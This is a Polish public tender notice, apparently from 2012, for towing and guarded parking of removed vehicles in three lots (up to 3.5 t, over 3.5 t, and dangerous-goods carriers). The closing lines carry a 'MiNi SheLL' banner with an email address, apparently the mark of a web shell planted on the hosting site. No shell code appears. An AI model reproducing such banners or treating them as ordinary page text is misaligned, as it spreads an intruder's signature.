<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany umowy w następującym zakresie: - jeżeli zmiany umowy są korzystne dla Zamawiającego, - jeżeli zajdą okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, -rozszerzenia zakresu przedmiotu umowy o zadania wynikające z art. 50a ustawy Prawo ruchu drogowym oraz art. 95 ustawy o transporcie drogowym, - w przypadku zmiany stawki podatku VAT ceny jednostkowe netto nie ulegną zmianie, nastąpią jedynie zmiany cen jednostkowych brutto, - cena jednostkowa brutto zostanie obliczona jako suma ceny netto i iloczynu ceny netto i nowej stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bieszczadzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Ustrzykach Dolnych ,ul. Bełska 22, 38-700 Ustrzyki Dolne,
 pokój nr 19 -II piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2012 godzina 11:30, miejsce: Starostwo Powiatowe w Ustrzykach Dolnych, ul. Bełska 22, 38-700 Ustrzyki Dolne- I piętro, pokój nr 8 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr I: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej do 3, 5 tony.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj pojazdów wchodzących w zakres zadania: rowery, motorowery, motocykle, pojazdy o dopuszczalnej masie całkowitej do 3,5 t.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni  w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu  miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów do 3,5 t - 8 miejsc parkingowych;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu - odstąpienie od usługi.
- Dyspozycję usunięcia pojazdu z drogi wydają uprawnione organy, określone przepisami art.130a ust. 4 ustawy - Prawo o ruchu drogowym oraz rozporządzenia.
- Treść art. 130a ustawy z 20 czerwca 1997 r. - Prawo o ruchu drogowym w brzmieniu obowiązywania od 21 sierpnia 2011 r. oraz wydanego na jego podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011 r. w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej zawiera Załącznik Nr 1 i 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5, 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr II: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów o dopuszczalnej masie całkowitej przekraczającej 3, 5 tony:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj pojazdów wchodzących w zakres zadania: pojazdy o dopuszczalnej masie całkowitej przekraczającej 3,5 t.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta i holownik z wciągarką w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów powyżej 3,5 t - 4 miejsca parkingowe;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu - odstąpienie od usługi.
- Dyspozycję usunięcia pojazdu z drogi wydają uprawnione organy, określone przepisami art.130a ust. 4 ustawy - Prawo o ruchu drogowym oraz rozporządzenia.
- Treść art. 130a ustawy z 20 czerwca 1997 r. - Prawo o ruchu drogowym w brzmieniu
obowiązywania od 21 sierpnia 2011 r. oraz wydanego na jego podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011 r. w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej zawiera Załącznik Nr 1 i 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5, 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie Nr III: Usuwanie pojazdów oraz prowadzenie parkingu strzeżonego dla pojazdów przewożących materiały niebezpieczne:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj pojazdów wchodzących w zakres zadania: wszelkie pojazdy przewożące materiały niebezpieczne.
Przedmiotem zamówienia jest usługa świadczona całodobowo przez 7 dni w tygodniu  polegająca na holowaniu i parkowaniu pojazdów usuniętych na podstawie art.130a ustawy Prawo o ruchu drogowym.
Zakres podstawowych czynności wchodzących w skład zlecenia usługi transportowej (bez względu na warunki atmosferyczne, porę dnia lub nocy oraz utrudnienia wynikające z ukształtowania terenu, warunków zabudowy inne) obejmuje:
a)	przyjęcie zlecenia przyjazdu pojazdu holującego;
b)	dojazd do wskazanego przez upoważnioną osobę wydającą dyspozycję usunięcia pojazdu  miejsca przebywania pojazdu w czasie do 60 minut;
c)	przygotowanie pojazdu lub pojazdu i jego elementów do załadunku (wszelkie prace towarzyszące przygotowaniu pojazdu do transportu);
d)	załadunek pojazdu (części pojazdu) na zestaw holujący;
e)	wyciąganie pojazdu spoza drogi o ile jest to konieczne w celu usunięcia pojazdu z miejsca zdarzenia;
f)	uporządkowanie miejsca zdarzenia z odpadków szkła, metalu i innych odpadków nie wymagających użycia specjalistycznego sprzętu i materiałów;
g)	dojazd z pojazdem transportowanym na wyznaczony parking strzeżony;
h)	rozładunek i parkowanie pojazdu na parkingu Wykonawcy;
i)	przechowywanie w zabezpieczonym pomieszczeniu wyposażenia pojazdu, części lub innych elementów zabezpieczonego pojazdu, które zostały oddzielone od pojazdu i mogłyby ulec zniszczeniu lub zaginięciu w miejscu do przechowywania pojazdów.
Do holowania pojazdów winien być wykorzystywany sprzęt specjalistyczny przeznaczony do tego rodzaju zadań typu laweta, holownik i wciągarka w liczbie zapewniającej możliwość sprawnego i ciągłego odholowania pojazdu z każdego miejsca na terenie Powiatu Brzozowskiego w możliwie najszybszym czasie.
Parkowanie pojazdów winno się odbywać na parkingu strzeżonym, odpowiednio ogrodzonym, oświetlonym, monitorowanym z całodobowym dozorem. 
a)	ogrodzenie parkingu trwałe - betonowe lub metalowe;
b)	nawierzchnia parkingu powinna być utwardzona; 
c)	pojazdy uszkodzone winy być zabezpieczone w sposób niezagrażający środowisku, a jednocześnie tak, by ich stan nie ulegał znacznemu pogorszeniu poprzez parkowanie;
d)	minimalna ilość miejsc parkingowych dla pojazdów przewożących materiały niebezpieczne - 2 miejsca parkingowe;
e)	parking zamykany w sposób uniemożliwiający wjazd i wyjazd środka transportu bez zezwolenia osoby dozorującej.
Do przedmiotu zamówienia zaliczana jest usługa związana z odstępstwem od usunięcia pojazdu. Zakres czynności, które wchodzą w usługę:
a)	dojazd do miejsca zdarzenia - odstąpienie od wykonania usługi;
b)	dojazd do miejsca zdarzenia podjęcie czynności załadunku pojazdu odstąpienie od usługi
- Dyspozycję usunięcia pojazdu z drogi wydają uprawnione organy, określone przepisami art.130a ust. 4 ustawy - Prawo o ruchu drogowym oraz rozporządzenia.
- Treść art. 130a ustawy z 20 czerwca 1997 r. - Prawo o ruchu drogowym w brzmieniu
obowiązywania od 21 sierpnia 2011 r. oraz wydanego na jego podstawie rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 22 czerwca 2011 r. w sprawie usuwania pojazdów, których używanie może zagrażać bezpieczeństwu lub porządkowi ruchu drogowego albo utrudniających prowadzenie akcji ratowniczej zawiera Załącznik Nr 1 i 1a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.80.00-5, 50.11.81.10-9, 98.35.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com